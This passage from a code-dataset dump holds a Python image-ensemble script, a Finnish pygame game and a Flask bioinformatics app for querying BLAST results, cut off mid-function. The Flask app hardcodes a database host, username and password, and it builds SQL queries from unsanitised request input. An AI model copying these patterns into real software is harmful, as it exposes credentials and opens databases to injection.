np.average(imgs, weights=norm_psnr, axis=0) # uses weights from validation testing\n #mean_img = imgs.mean(axis=0) # uses no weights\n mean_img = mean_img.astype('uint8')\n return mean_img\n\n\ndef voting_ensemble(sortedweigths, images):\n # Majority voting: each pixel is compared to the same pixel in other models\n # the majority decides which values the pixel should hold\n height, width = len(images[0]), len(images[0])\n ensembleimage = 255 * np.ones((512, 512, 3), np.uint8)\n # for each pixel\n for x in range(width):\n for y in range(height):\n # get the pixel in all images\n pixelList = []\n for modelImage in images:\n pixel = modelImage[x, y]\n pixelList.append(pixel)\n # print(pixelList)\n\n votes = [0] * len(modelresults)\n # compare each pixel with the next pixels in the list\n for numbervote in range(len(pixelList)):\n pixel1 = pixelList[numbervote]\n result = len(votes) > 0 and any(elem > 2 for elem in votes) # if any pixel gets more than two votes, it has won\n if result:\n break\n for numbervote2 in range(numbervote + 1, len(pixelList)): # compare 0 with 1,2,3,4,5, 1 with 2,3,4,5, 2 with 3,4,5 etc.\n pixel2 = pixelList[numbervote2]\n if np.allclose(pixel1, pixel2):\n votes[numbervote] += 1\n if votes[numbervote] > 2: # if the pixel has more than two votes we dont need to compare anymore\n break\n # print(votes)\n maxIndexList = [i for i, j in enumerate(votes) if j == max(votes)]\n votesareequal = len(votes) > 0 and all(elem == votes[0] for elem in votes)\n\n if votesareequal: # if all the pixels have the same amount of votes, pick the one with highest weight\n\n winningvote = sortedweigths.index(max(sortedweigths))\n # print(\"weigthdecier\", winningvote)\n elif len(maxIndexList) > 1: # if some pixels have the same amount of votes, pick the one from the model with the highest weight\n highestweight = 0\n winningvalue = 0\n for value in maxIndexList:\n weigth = sortedweigths[value]\n if weigth > highestweight:\n highestweight = weigth\n winningvalue = value\n winningvote = votes[winningvalue]\n\n else: # one pixel has the highest amount of votes\n winningvote = votes.index(max(votes))\n\n # print(\"winning vote index\", winningvote)\n finalpixel = pixelList[winningvote]\n ensembleimage[x, y] = finalpixel # put the winning pixel in the ensemble image\n return ensembleimage\n\n\ndef compute_ensemble(HRpath, weigths, type=\"average\"):\n # goes trough each resulting image from the models and computes a single ensemble image from them based on type\n hrimages = [image for image in os.listdir(HRpath) if image.endswith('.png')]\n ensemblepsnr ,ensembleimages, ensembletime = [], [], []\n\n for hrimagenumber in range(0, len(hrimages)): # there is one result for each model for each HR image they tested on\n start = time.time()\n images=[]\n\n for i in range(0, len(modelresults)):\n images.append(modelresults[i][hrimagenumber]) # gets SR result of model number i for testing image number hrimagenumber\n sortedweigths = sortweigths(weigths, modelnames)\n\n if type == \"average\":\n ensembleimage = average_ensemble(sortedweigths, images)\n elif type == \"voting\":\n print(\"Starting vote on image\", hrimagenumber+1)\n ensembleimage = voting_ensemble(sortedweigths, images)\n else:\n print(\"Wrong ensemble type\")\n return None\n ensembletime.append(time.time()-start)\n ensembleimages.append(ensembleimage)\n hr = cv2.imread(HRpath + \"/\" + hrimages[hrimagenumber]) # read the HR image to compare with emsemble image\n psnr, ssim = util.calc_metrics(ensembleimage, hr, crop_border=2) # computes psnr/ssim value of the ensemble\n ensemblepsnr.append((psnr,ssim))\n\n return ensembleimages,ensemblepsnr,ensembletime # returns lists of all the ensemble images and their psnr value\n\ndef perimageresults(modelresults,modelnames,modelpsnr):\n # prints the collected models results for each hr image in one line per image\n hrimages = [image for image in os.listdir(HRpath) if image.endswith('.png')]\n with open(os.getcwd()+ '/FAWDN/results/Modelpics/model.csv', 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=';')\n for hrimagenumber in range(0, len(hrimages)):\n printtext = hrimages[hrimagenumber] +\" PSNR/SSIM: \"\n averagepsnr = []\n averagessim = []\n for i in range(0, len(modelresults)):\n #print(modelpsnr)\n #print(modelpsnr[i][hrimagenumber])\n psnr = modelpsnr[i][0][hrimagenumber] # [which model][psnr or ssim][image number]\n ssim = modelpsnr[i][1][hrimagenumber] # ssim\n averagepsnr.append(psnr)\n averagessim.append(ssim)\n\n #psnr, ssim = modelpsnr[0][i][hrimagenumber]\n printtext +=str(modelnames[i])+\" \" + str(round(psnr, 2)) +\" / \"+ str(round(ssim, 2)) + \" || \"\n writer.writerow((modelnames[i], str(round(psnr, 2)), str(round(ssim, 2))))\n\n printtext += \" Average \" + str(round(np.mean(averagepsnr), 2))+\" / \"+str(round(np.mean(averagessim), 2))\n averagepsnr= str(np.mean(averagepsnr))\n averagessim = str(np.mean(averagessim))\n writer.writerow((\"Average\",averagepsnr,averagessim ))\n print(printtext)\n\n\ndef start_processes(json_files):\n # starts an amount of processes equal the amount of models provided\n processes= []\n for model in json_files:\n print(\"Running \", model)\n p = Process(target=start_FAWDN, args=(LRpath, HRpath, path_to_jsonfolder + model, modelresults, modelnames, modelpsnr))\n p.start()\n processes.append(p)\n return processes\n\n\nif __name__ == '__main__':\n manager = mp.Manager()\n modelresults, modelnames, modelpsnr = manager.list(), manager.list(), manager.list()\n #sharedlistnames = manager.list()\n\n\n path_to_jsonfolder = os.getcwd()+\"/FAWDN/options/final/\" # current working directoy C:\\Users\\tobia\\Documents\\GitHub\\VGIS8\\\n LRpath = os.getcwd()+\"/FAWDN/results/test/lr\"\n HRpath = os.getcwd()+\"/FAWDN/results/test/hr\"\n\n json_files = [pos_json for pos_json in os.listdir(path_to_jsonfolder) if pos_json.endswith('.json')]\n processes = start_processes(json_files)\n\n for p in processes:\n p.join() #wait for all the processes to finish\n\n weigths = compute_weigths(path_to_jsonfolder)\n\n ensembleimages, ensemblepsnr, ensembletime = compute_ensemble(HRpath,weigths, type=\"voting\") #type = \"average\" or \"voting\"\n\n # show and save the ensemble results\n with open(os.getcwd()+ '/FAWDN/results/Ensemble/ensemble.csv', 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=';')\n for y in range (0,len(ensembleimages)):\n cv2.imshow(str(y), ensembleimages[y])\n path=os.getcwd()+\"/FAWDN/results/Ensemble/\"+str(y+1)\n cv2.imwrite(path+\".png\", ensembleimages[y])\n psnr, ssim = ensemblepsnr[y]\n print(\"Ensemble image number\" ,str(y+1), \"PSNR/SSIM:\",round(psnr,2),\"/\",round(ssim,2), \"computation time:\" ,ensembletime[y])\n psnr = str(round(psnr,2))\n ssim = str(round(ssim, 2))\n writer.writerow((y+1,psnr, ssim))\n\n perimageresults(modelresults, modelnames, modelpsnr)\n #print(\"ensemble psnr/ssim\", psnr, ssim)\n\n # show and save the individual models results\n for i in range(0,len(modelresults)):\n for j in range(0,len(modelresults[i])):\n path =os.getcwd()+\"/FAWDN/results/Modelpics/\"+str(modelnames[i])+\"imagenum\"+str(j+1)\n cv2.imshow(str(modelnames[i])+\"imagenum\"+str(j+1), modelresults[i][j])\n cv2.imwrite(path+\".png\",modelresults[i][j])\n cv2.waitKey(0)\n","sub_path":"Ensemble.py","file_name":"Ensemble.py","file_ext":"py","file_size_in_byte":10682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"591367372","text":"#Vihollispeli\nimport pygame\nimport random\n\nnaytto = pygame.display.set_mode((640, 400)) \npygame.display.set_caption(\"Piirtäminen\")\n\ndef piirtaminen(naytto, hahmot, viholliset): \n naytto.fill((0, 0, 0))\n for hahmo in hahmot:\n if hahmo[3] == True:\n kuva = pygame.image.load(hahmo[0]).convert()\n naytto.blit(kuva, (hahmo[1], hahmo[2]))\n for vihollinen in viholliset:\n if vihollinen[3] == True:\n kuva = pygame.image.load(vihollinen[0]).convert()\n naytto.blit(kuva, (vihollinen[1], vihollinen[2])) \n pygame.display.flip()\n\ndef kontrolli(hahmot, tapahtuma, viholliset): \n for vihollinen in viholliset: \n hahmo = hahmot[0]\n if (vihollinen[1] == hahmo[1]) and (vihollinen[2] == hahmo[2]): \n del hahmot[0] \n if tapahtuma.type == pygame.KEYDOWN:\n if tapahtuma.key == pygame.K_SPACE:\n for hahmo in hahmot:\n hahmo[3] = True \n for vihollinen in viholliset:\n vihollinen[3] = True\n elif tapahtuma.key == pygame.K_RIGHT:\n päähahmo = hahmot[0]\n päähahmo[1] += 10 \n elif tapahtuma.key == pygame.K_LEFT:\n päähahmo = hahmot[0] \n päähahmo[1] += -10\n elif tapahtuma.key == pygame.K_DOWN: \n päähahmo = hahmot[0]\n päähahmo[2] += 10 \n elif tapahtuma.key == pygame.K_UP:\n päähahmo = hahmot[0]\n päähahmo[2] += -10 \n else: \n return \n\ndef main():\n kissahahmo = [\"cat.png\", 0, 0, False]\n sotilashahmo = [\"Sotilas.png\", 100, 0, False] \n hahmot = [kissahahmo, sotilashahmo]\n vihollinen1 = [\"Animaatiosotilas.png\", 150, 200, True] \n vihollinen2 = [\"Animaatiosotilaat.png\", 350, 200, True]\n vihollinen3 = [\"Vihollinen.jpg\", 550, 200, True] \n viholliset = [vihollinen1, vihollinen2, vihollinen3] \n while True:\n tapahtuma = pygame.event.poll()\n if tapahtuma.type == pygame.QUIT:\n break \n for vihollinen in viholliset:\n #del hahmot[0] \n \n if vihollinen[1] > 640:\n vihollinen[1] = 0 \n vihollinen[2] = random.randint(0, 400)\n else:\n vihollinen[1] += 0.5\n \n kontrolli(hahmot, tapahtuma, viholliset)\n piirtaminen(naytto, hahmot, viholliset) \nmain() \n","sub_path":"ESIMERKIT/Tietokantataulu.py","file_name":"Tietokantataulu.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"61380250","text":"# makers: Sanne en Inge\r\n# de benodigde python code om de website te laten werken en de goeie resultaten te krijgen\r\n\r\nfrom flask import Flask, render_template, request\r\nimport mysql.connector\r\nimport re\r\nfrom Bio.Blast import NCBIWWW, NCBIXML\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/', methods=['get', 'post'])\r\ndef home():\r\n \"\"\" Deze functie returnd een html template\r\n \r\n :return render template van de database_page2.html, geeft de homepagina weer\r\n \"\"\"\r\n return render_template('Database_page2.html')\r\n\r\n\r\n@app.route('/results', methods=['get', 'post'])\r\ndef results_filters():\r\n \"\"\" Deze functie heeft 2 lijsten, 1 lijst voor de kolommen, en 1 lijst voor alle checkboxes. Hij gaat elke checkbox\r\n af om te kijken of deze een waarde heeft, als dat zo is wordt deze is een nieuwe lijst toegevoegd. Daarna\r\n worden er functies aangeroepen voor filters en waardes. Als er niet is gefilterd op kolommen wordt de lijst met\r\n kolommen gereturnd en als er wel is gefilterd op kolommen wordt deze lijst gereturnd. De accessiecodes worden\r\n ook opgehaald\r\n\r\n :return lijst kolommen als niet op kolommen is gefilterd, samen met andere filters en accessie_index en resultaat\r\n :return lijst resultaat_kolommen als er wel op kolommen is gefilterd, smaen met andere filters, resultaat en\r\n accessie_index\r\n \"\"\"\r\n # lijsten met de waardes van mogelijke filteropties, deze staan vast in het script vanwege tabellen die we niet\r\n # willen laten zien, de lijsten bestaan uit de waardes van de checkboxes\r\n lijst = [\"checkboxOne\", \"checkboxTwo\", \"checkboxThree\", \"checkboxFour\", \"checkboxFive\", \"checkboxSix\",\r\n \"checkboxSeven\", \"checkboxEight\", \"checkboxNine\", \"checkboxTen\", \"checkboxEleven\", \"checkboxTwelve\",\r\n \"checkboxThirteen\", \"checkboxFourteen\", \"checkboxFifteen\", \"checkboxSixteen\"]\r\n lijst_kolommen = [\"Blast_type\", \"Score\", \"Query_cover\", \"Percent_ident\", \"E_value\", \"Accessiecode\", \"Organisme\",\r\n \"Taxonomie\", \"Read_type\", \"Sequentie\", \"Prot_naam\"]\r\n resultaat_kolommen = []\r\n # de filterstappen om de juiste lijsten te krijgen met de waardes voor de query's\r\n for item in lijst:\r\n result = request.form.get(item)\r\n if result is not None:\r\n resultaat_kolommen.append(result)\r\n\r\n resultaat_where = filters()\r\n e_value, score, percentidentity, querycover = waardes_getallen()\r\n resultaat_where_ = filters_getallen(resultaat_where, e_value, score, percentidentity, querycover)\r\n # deze functie wordt aangeroepen om de querys uit te voeren\r\n resultaat = result_querys(lijst_kolommen, resultaat_kolommen, resultaat_where_)\r\n # afhankelijk of er gefilterd is op de kolommen krijg je een andere return\r\n accesie_index = lijst_kolommen.index(\"Accessiecode\")\r\n if len(resultaat_kolommen) == 0:\r\n return render_template('results.html', accesie_index=accesie_index, data=resultaat, lijst=lijst_kolommen)\r\n if len(resultaat_kolommen) != 0:\r\n return render_template('results.html', data=resultaat, lijst=resultaat_kolommen)\r\n\r\n\r\ndef filters():\r\n \"\"\" Deze functie heeft een lijst met waardes waar op gefilterd kan worden. Deze worden nagelopen of deze een waarde\r\n hebben, als dat zo is wordt deze toegevoegd in een nieuwe lijst dat deze door een query zo kan worden uitgevoerd,\r\n als de lijst leeg is, wordt er nog 'where' toegvoegd in de zin.\r\n\r\n :return lijst met alle filters waar op gefilterd kan worden\r\n \"\"\"\r\n resultaat_where = []\r\n lijst_filters = [\"organisme\", \"eiwit\", \"checkboxread1\", \"checkboxread2\", \"checkboxread3\",\r\n \"checkboxblastx\", \"checkboxtblastx\", \"checkboxboth\"]\r\n # de reden waarom hier vanaf index 1 2 opties worden gegeven is vanwege dat je bij de eerste een where hebt staan\r\n # voor de query anders werkt die niet, dan is de keuze steeds of er een where komt te staan of niet een where\r\n # wat afhankelijk is van de lengte van de lijst\r\n for item in lijst_filters:\r\n index_getal = lijst_filters.index(item)\r\n result = request.form.get(item)\r\n if result is not None:\r\n if len(result) > 0:\r\n if index_getal == 0:\r\n resultaat_where.append(\"where Organisme like '%{}%'\".format(result))\r\n if index_getal == 1:\r\n if len(resultaat_where) > 1:\r\n resultaat_where.append(\"Prot_naam like '%{}%'\".format(result))\r\n elif len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Prot_naam like '%{}%'\".format(result))\r\n if index_getal == 2 or index_getal == 3:\r\n if len(resultaat_where) > 0:\r\n resultaat_where.append(\"Read_type = {}\".format(result))\r\n if len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Read_type = {}\".format(result))\r\n if index_getal == 4:\r\n if len(resultaat_where) > 0:\r\n resultaat_where.append(\"{}\".format(result))\r\n if len(resultaat_where) == 0:\r\n resultaat_where.append(\"where {}\".format(result))\r\n if index_getal == 5 or index_getal == 6:\r\n if len(resultaat_where) > 0:\r\n resultaat_where.append(\"Blast_type = {}\".format(result))\r\n if len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Blast_type = {}\".format(result))\r\n if index_getal == 7:\r\n if len(resultaat_where) > 0:\r\n resultaat_where.append(\"{}\".format(result))\r\n if len(resultaat_where) == 0:\r\n resultaat_where.append(\"where {}\".format(result))\r\n\r\n return resultaat_where\r\n\r\n\r\ndef waardes_getallen():\r\n \"\"\" Deze functie maakt een lijst aan voor getallen waar op gefilterd kan worden. Voor elke waarde wordt gekeken of\r\n het een waarde heeft, en deze wordt dan aan een variabele gehangen\r\n\r\n :return: de variabelen E_value, score_value, Percent identity en query cover met hun waarde\r\n \"\"\"\r\n lijst_getallen = [\"E-value_value\", \"Score_value\", \"Percent identity\", \"Query cover\"]\r\n # we slaan deze waardes op in een variabele om zo de goeie waardes straks te kunnen filteren in de database\r\n e_value = ''\r\n score = ''\r\n percentidentity = ''\r\n querycover = ''\r\n for item in lijst_getallen:\r\n index_getal = lijst_getallen.index(item)\r\n result = request.form.get(item)\r\n if len(result) > 0:\r\n if index_getal == 0:\r\n e_value = result\r\n if index_getal == 1:\r\n score = result\r\n if index_getal == 2:\r\n percentidentity = result\r\n if index_getal == 3:\r\n querycover = result\r\n\r\n return e_value, score, percentidentity, querycover\r\n # de opgeslagen waardes komen nu samen in een lijst te staan, we doen het op deze manier anders krijg je de\r\n # verkeerde waardes voor de zoekopdrachten\r\n\r\n\r\ndef filters_getallen(resultaat_where, e_value, score, percentidentity, querycover):\r\n \"\"\" Deze functie maakt een lijst aan voor de filters, in die lijst wordt gekeken of het een waarde bevat, zo ja\r\n dan wordt deze toegevoegd in de lijst resultaat_where, als deze lijst leeg is wordt er nog 'where' aan toegevoegd\r\n anders niet. Daarna wordt deze lijst weer gereturnd\r\n\r\n :param resultaat_where: eerdere filters worden meegenomen om 1 lijst te krijgen\r\n :param e_value: eventueel een waarde waar op gefilterd kan worden\r\n :param score: eventueel een waarde waar op gefilterd kan worden\r\n :param percentidentity: eventueel een waarde waar op gefilterd kan worden\r\n :param querycover: eventueel een waarde waar op gefilterd kan worden\r\n :return: resultaat_where, lijst met alle filters\r\n \"\"\"\r\n lijst_tekens = [\"E_value_parameter\", \"Score_parameter\", \"percent_identity_parameter\", \"query_cover_parameter\"]\r\n for item in lijst_tekens:\r\n index_getal = lijst_tekens.index(item)\r\n result = request.form.get(item)\r\n if len(result) > 0:\r\n if index_getal == 0 and e_value != '' and len(resultaat_where) > 0:\r\n resultaat_where.append(\"E_value {} {}\".format(result, e_value))\r\n elif index_getal == 0 and e_value != '' and len(resultaat_where) == 0:\r\n resultaat_where.append(\"where E_value {} {}\".format(result, e_value))\r\n if index_getal == 1 and score != '' and len(resultaat_where) > 0:\r\n resultaat_where.append(\"Score {} {}\".format(result, score))\r\n elif index_getal == 1 and score != '' and len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Score {} {}\".format(result, score))\r\n if index_getal == 2 and percentidentity != '' and len(resultaat_where) > 0:\r\n resultaat_where.append(\"Percent_ident {} {}\".format(result, percentidentity))\r\n elif index_getal == 2 and percentidentity != '' and len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Percent_ident {} {}\".format(result, percentidentity))\r\n if index_getal == 3 and querycover != '' and len(resultaat_where) > 0:\r\n resultaat_where.append(\"Query_cover {} {}\".format(result, percentidentity))\r\n elif index_getal == 3 and querycover != '' and len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Query_cover {} {}\".format(result, percentidentity))\r\n return resultaat_where\r\n\r\n\r\ndef result_querys(lijst_kolommen, resultaat_kolommen, resultaat_where):\r\n \"\"\" Deze functie maakt connectie aan met de database, en kan dan 2 querys gaan uitvoeren. 1 query als er gefilterd\r\n is op kolommen, dan wordt ook nog de lijst resultaat_where meegegeven in de query. De andere query als er niet is\r\n gefilterd op kolommen, dan wordt ook de lijst resultaat_where nog meegegeven. Een van deze querys worden uitgevoerd\r\n en het resultaat wordt gereturnd.\r\n\r\n :param lijst_kolommen:\r\n :param resultaat_kolommen:\r\n :param resultaat_where:\r\n :return: resultaat van de query\r\n \"\"\"\r\n # hier wordt de connectie gemaakt van de database\r\n verbinding = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cursor = verbinding.cursor(dictionary=True)\r\n # de query's die worden uitgevoerd, afhankelijk van de gegevens\r\n resultaat = ''\r\n if len(resultaat_kolommen) == 0:\r\n query = \"select {} from seq_read join blast b on seq_read.Read_ID = b.Blast_ID \" \\\r\n \"join eiwitten e on b.Blast_ID = e.Prot_id {}\" \\\r\n .format(\" , \".join(lijst_kolommen), \" and \".join(resultaat_where))\r\n cursor.execute(query)\r\n resultaat = cursor.fetchall()\r\n if len(resultaat_kolommen) != 0:\r\n query = \"select {} from seq_read join blast b on seq_read.Read_ID = b.Blast_ID \" \\\r\n \"join eiwitten e on b.Blast_ID = e.Prot_id {}\" \\\r\n .format(\" , \".join(resultaat_kolommen), \" and \".join(resultaat_where))\r\n cursor.execute(query)\r\n resultaat = cursor.fetchall()\r\n cursor.close()\r\n verbinding.close()\r\n return resultaat\r\n\r\n\r\n@app.route('/organism')\r\ndef organisms():\r\n \"\"\" Deze functie roept eerst 2 waardes op. Daarna als de ene waarde 'None' is, wordt er connectie gelegd aan de\r\n database en wordt er gefilterd op Organismenamen op alfabetische volgorde. Dan wordt er een render_template\r\n gereturnd van organisme samen met het resultaat van de query. Als de waarde niet 'None' is, wordt er een andere\r\n query uitgevoerd met het gekozen organisme naam om daar gegevens van op te halen. Dan wordt er een render_template\r\n organisme gereturnd met resultaat van de query\r\n\r\n :return: render_template 'organisme' met resultaat van 1 van de querys\r\n \"\"\"\r\n org = request.args.get(\"organismelijst\")\r\n org2 = \"Where Organisme like '%{}%'\".format(org)\r\n\r\n if org is None:\r\n # hier is de query om in de website de lijst met Organisme te laten zien\r\n connection = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cur = connection.cursor(dictionary=True)\r\n cur.execute(\r\n \"select distinct Organisme,Score,E_value,Actual_ID,Percent_ident,Accessiecode,Query_cover,Taxonomie \"\r\n \"from blast order by Organisme \")\r\n\r\n data = cur.fetchall()\r\n return render_template('organism.html', data=data)\r\n else:\r\n connection = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cur = connection.cursor(dictionary=True)\r\n query = \"select distinct Organisme,Score,E_value,Actual_ID,Percent_ident,Accessiecode,Query_cover,Taxonomie \" \\\r\n \"from blast {} order by Organisme\".format(org2)\r\n\r\n cur.execute(query)\r\n\r\n data = cur.fetchall()\r\n return render_template('organism.html', data=data)\r\n\r\n\r\n@app.route('/protein')\r\ndef protein():\r\n \"\"\" Deze functie roept eerst 2 waardes op. Daarna als de ene waarde 'None' is, wordt er connectie gelegd aan de\r\n database en wordt er gefilterd op eiwitnamen op alfabetische volgorde. Dan wordt er een render_template\r\n gereturnd van proein samen met het resultaat van de query. Als de waarde niet 'None' is, wordt er een andere\r\n query uitgevoerd met het gekozen eiwitnaam om daar gegevens van op te halen. Dan wordt er een render_template\r\n protein gereturnd met resultaat van de query\r\n\r\n :return: render_template 'protein' met resultaat van 1 van de querys\r\n \"\"\"\r\n prot = request.args.get(\"proteinlijst\")\r\n prot2 = \"Where Prot_naam like '%{}%'\".format(prot)\r\n # hier is de query om in de website de lijst met eiwitten te laten zien\r\n connection = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cur = connection.cursor(dictionary=True)\r\n if prot is None:\r\n cur.execute(\r\n \"select distinct Prot_naam, Score,E_value,Actual_ID,Percent_ident,Accessiecode,Query_cover,Taxonomie \"\r\n \"from eiwitten join blast on Prot_id = Actual_ID order by Prot_naam\")\r\n\r\n data = cur.fetchall()\r\n return render_template('protein.html', data=data)\r\n else:\r\n query = \"select distinct Prot_naam, Score,E_value,Actual_ID,Percent_ident,Accessiecode,Query_cover,Taxonomie \" \\\r\n \"from eiwitten join blast on Prot_id = Actual_ID {} order by Prot_naam\".format(prot2)\r\n cur.execute(query)\r\n data = cur.fetchall()\r\n return render_template('protein.html', data=data)\r\n\r\n\r\n@app.route('/blast')\r\ndef blast():\r\n \"\"\" Deze functie haalt de sequentie op, en gaat met een regular expression kijken of het dna, rna of eiwit is. Als\r\n het 1 van deze waarde is, wordt deze waarde op 'True' gezet, de rest staat op False. Als het geen van alle is, wordt\r\n anders op True gezet. Daarna wordt er een andere functie aangeroepen voor het resultaat en de titel wat de resultaat\r\n van een eventuele blast is.\r\n\r\n :return: render_template 'blast' met sequentie, resultaat en titel\r\n \"\"\"\r\n sequentie = request.args.get(\"seq\")\r\n add = request.args.get(\"adding\")\r\n dna = False\r\n rna = False\r\n eiwit = False\r\n anders = False\r\n # dit bepaalt wat de ingevoerde sequentie wordt\r\n if sequentie is not None:\r\n if len(re.findall(\"[ATCG]\", sequentie, flags=re.IGNORECASE)) == len(sequentie):\r\n dna = True\r\n elif len(re.findall(\"[AUCG]\", sequentie, flags=re.IGNORECASE)) == len(sequentie):\r\n rna = True\r\n elif len(re.findall(\"[ARNDCFQEGHILKMPSTWYV]\", sequentie, flags=re.IGNORECASE)) == len(sequentie):\r\n eiwit = True\r\n else:\r\n anders = True\r\n resultaat = resultaat_beschrijving(dna, rna, eiwit, anders)\r\n titel = blasten(dna, sequentie)\r\n # if add is None:\r\n # resultaten_database()\r\n # if add is not None:\r\n # adding(add)\r\n return render_template('BLAST.html', sequentie=sequentie, resultaat=resultaat, titel=titel)\r\n\r\n\r\ndef resultaat_beschrijving(dna, rna, eiwit, anders):\r\n \"\"\" Deze functie geeft een string mee, afhankelijk welke waarde op True staat.\r\n\r\n :param dna: True of False waarde, afhankelijk wat de sequentie is\r\n :param rna: True of False waarde, afhankelijk wat de sequentie is\r\n :param eiwit: True of False waarde, afhankelijk wat de sequentie is\r\n :param anders: True of False waarde, afhankelijk wat de sequentie is\r\n :return: string met resultaat wat de ingevoerde sequentie is\r\n \"\"\"\r\n resultaat = ''\r\n # het resultaat wat wordt uitgeprint voor de gebruiken om het te controleren\r\n if dna is True:\r\n resultaat = \"The sequence is DNA\"\r\n elif rna is True:\r\n resultaat = \"The sequence is RNA\"\r\n elif eiwit is True:\r\n resultaat = \"The sequence is protein\"\r\n elif anders is True:\r\n resultaat = \"The sequence is not DNA, RNA or protein\"\r\n\r\n return resultaat\r\n\r\n\r\ndef blasten(dna, sequentie):\r\n \"\"\" Deze sequentie gaat als DNA op True staat, een blast uitvoeren. Hij haalt dan de sequentie op en het blast_type,\r\n hiermee gaat hij naar een andere functie op de blast uit te voeren. Als de titel leeg is, is er geen match gevonden,\r\n is deze niet leeg, dan staan er de blast resultaten in.\r\n\r\n :param dna: True of False afhankelijk wat de ingevoerde sequentie is\r\n :param sequentie: de sequentie die is ingevoerd\r\n :return: de titel, wat of resultaat van de blast bevat of een string waar in staat dat er geen resultaat is gevonden\r\n \"\"\"\r\n if dna is True:\r\n blast_type = request.args.get(\"blast_type\")\r\n if sequentie is not None and blast_type == \"blastx\":\r\n blast_resultaat, titel = blastx_blasten(sequentie)\r\n if sequentie is not None and blast_type == \"tblastx\":\r\n blast_resultaat, titel = tblastx_blasten(sequentie)\r\n else:\r\n titel = ''\r\n\r\n if titel == '':\r\n titel = \"There is no match with: {}\".format(sequentie)\r\n else:\r\n titel = \"\\n\".join(blast_resultaat)\r\n return titel\r\n\r\n\r\ndef blastx_blasten(sequentie):\r\n \"\"\" Deze sequentie opent een leeg XML file, daarna gaat het de blast uitvoeren met blastx. De gegevens van deze\r\n blast worden opgeslageni in het bestand en dit bestand wordt gesloten. Daarna wordt dit bestand weer geopend en\r\n wordt voor elk resultaat het organisme, eiwit, sequentie, lengte, e_value en stukje van de vergelijking opgeslagen\r\n in een lege lijst. Deze wordt samen met titel wat een lege string is gereturnd.\r\n\r\n :param sequentie: de ingevoerde sequentie\r\n :return: blastresultaat, een lijst met gegevens van de blatresultaten\r\n :return titel, een lege string\r\n \"\"\"\r\n titel = ''\r\n blast_resultaat = []\r\n bestand = open(\"Resultaat.xml\", \"w\")\r\n result_handle = NCBIWWW.qblast(\"blastx\", \"nr\", sequentie, alignments=1, hitlist_size=10)\r\n bestand.write(result_handle.getvalue())\r\n bestand.close()\r\n\r\n result_handle = open(\"Resultaat.xml\", \"r\")\r\n blast_records = NCBIXML.parse(result_handle)\r\n blast_record = next(blast_records)\r\n for alignment in blast_record.alignments:\r\n for hsp in alignment.hsps:\r\n blast_resultaat.append(\"****Alignment****\")\r\n titel = alignment.title\r\n titels = titel.split(\"[\")\r\n titelss = titels[1].split(\"]\")\r\n titel_ = titel.split(\"|\")\r\n titel__ = titel_[2].split(\"[\")\r\n blast_resultaat.append(\"Blast organism: {}\".format(titelss[0]))\r\n blast_resultaat.append(\"Protein: {}\".format(titel__[0]))\r\n blast_resultaat.append(\"Sequence: {}\".format(alignment.title))\r\n blast_resultaat.append(\"Length: {}\".format(alignment.length))\r\n blast_resultaat.append(\"E-value: {}\".format(hsp.expect))\r\n blast_resultaat.append(hsp.query[0:75] + \"...\")\r\n blast_resultaat.append(hsp.match[0:75] + \"...\")\r\n blast_resultaat.append(hsp.sbjct[0:75] + \"...\")\r\n blast_resultaat.append(\"\\n\")\r\n\r\n return blast_resultaat, titel\r\n\r\n\r\ndef tblastx_blasten(sequentie):\r\n \"\"\" Deze sequentie opent een leeg XML file, daarna gaat het de blast uitvoeren met tblastx. De gegevens van deze\r\n blast worden opgeslageni in het bestand en dit bestand wordt gesloten. Daarna wordt dit bestand weer geopend en\r\n wordt voor elk resultaat het organisme, sequentie, lengte, e_value en stukje van de vergelijking opgeslagen\r\n in een lege lijst. Deze wordt samen met titel wat een lege string is gereturnd.\r\n\r\n :param sequentie: de ingevoerde sequentie\r\n :return: blastresultaat, een lijst met gegevens van de blatresultaten\r\n :return titel, een lege string\r\n \"\"\"\r\n titel = ''\r\n blast_resultaat = []\r\n bestand = open(\"Resultaat.xml\", \"w\")\r\n result_handle = NCBIWWW.qblast(\"tblastx\", \"nr\", sequentie, alignments=1, hitlist_size=10)\r\n bestand.write(result_handle.getvalue())\r\n bestand.close()\r\n\r\n result_handle = open(\"Resultaat.xml\", \"r\")\r\n blast_records = NCBIXML.parse(result_handle)\r\n blast_record = next(blast_records)\r\n for alignment in blast_record.alignments:\r\n for hsp in alignment.hsps:\r\n blast_resultaat.append(\"****Alignment****\")\r\n titel = alignment.title\r\n titels = titel.split(\"|\")\r\n titel = \"Blast organisme: \" + titels[4]\r\n blast_resultaat.append(\"Blast organisme: {}\".format(titels[4]))\r\n blast_resultaat.append(\"Sequence: {}\".format(alignment.title))\r\n blast_resultaat.append(\"Length: {}\".format(alignment.length))\r\n blast_resultaat.append(\"E-value: {}\".format(hsp.expect))\r\n blast_resultaat.append(hsp.query[0:75] + \"...\")\r\n blast_resultaat.append(hsp.match[0:75] + \"...\")\r\n blast_resultaat.append(hsp.sbjct[0:75] + 